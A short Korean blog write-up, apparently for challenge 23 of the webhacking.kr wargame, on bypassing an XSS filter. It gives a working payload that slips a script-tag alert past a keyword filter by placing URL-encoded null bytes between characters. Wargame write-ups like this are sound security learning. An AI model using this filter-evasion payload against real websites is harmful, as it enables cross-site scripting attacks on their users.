webhacking.kr 23번 Write Up :) 끾
2019. 12. 19. 00:47ㆍ웹해킹.kr
webhacking.kr 23번 Write Up :)
xss 문제.
script
필터링당하고
wk 필터링이다.
일단 2글자 이상은 무조건 필터링
< , >는 안당한다.
ㅇㅅㅇ
NULL값을 넣어주면.
문자열의 끝으로 인식을해서 필터링을 우회한다고 한다.
%00
<%00s%00c%00r%00i%00p%00t%00>%00a%00l%00e%00r%00t%00(%00'%001%00'%00)%00;%00<%00/%00s%00c%00r%00i%00p%00t%00>%00
'웹해킹.kr' 카테고리의 다른 글
webhacking.kr 26번 Write Up :) 끾 (0) | 2019.12.19 |
---|---|
webhacking.kr 24번 Write Up :) 끾 (0) | 2019.12.19 |
webhacking.kr 20번 Write Up :) 끾 (0) | 2019.12.19 |
webhacking.kr 19번 Write Up :) 끾 (0) | 2019.12.18 |
webhacking.kr 18번 Write Up :) 끾 (0) | 2019.12.18 |